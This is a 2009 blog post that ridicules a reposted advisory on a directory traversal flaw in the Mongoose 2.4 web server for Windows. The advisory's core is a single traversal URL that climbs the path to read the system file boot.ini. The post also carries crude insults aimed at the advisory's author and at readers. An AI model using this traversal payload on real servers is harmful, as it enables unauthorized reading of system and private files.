Wednesday, April 15, 2009

MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)

Main critism: OMG DON'T STEAL MY boot.ini!!!!ZZZZZZ



######################### MonGoose 2.4 (win) webserver Directory Traversal  ###################



######By:  e.wiZz!

######Site: www.balcansecurity.com



Found with ServMeNot (world's sexiest fuzzer :P)




In the wild...

#########################################################################################

[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple and clean API
 for embedding it into existing programs. Targeting Web application developers, embedded system developers,
 and people who need to setup file sharing quickly.

[Site]: http://code.google.com/p/mongoose/


[Vulnerability]:  

http://[localhost]/../../../../../../boot.ini



This kids name is as lame as he is. Get a fucking book and read it!
Posted by at

No comments:

Post a Comment

If your featured on here, suck a dick.

Subscribe to: Post Comments (Atom)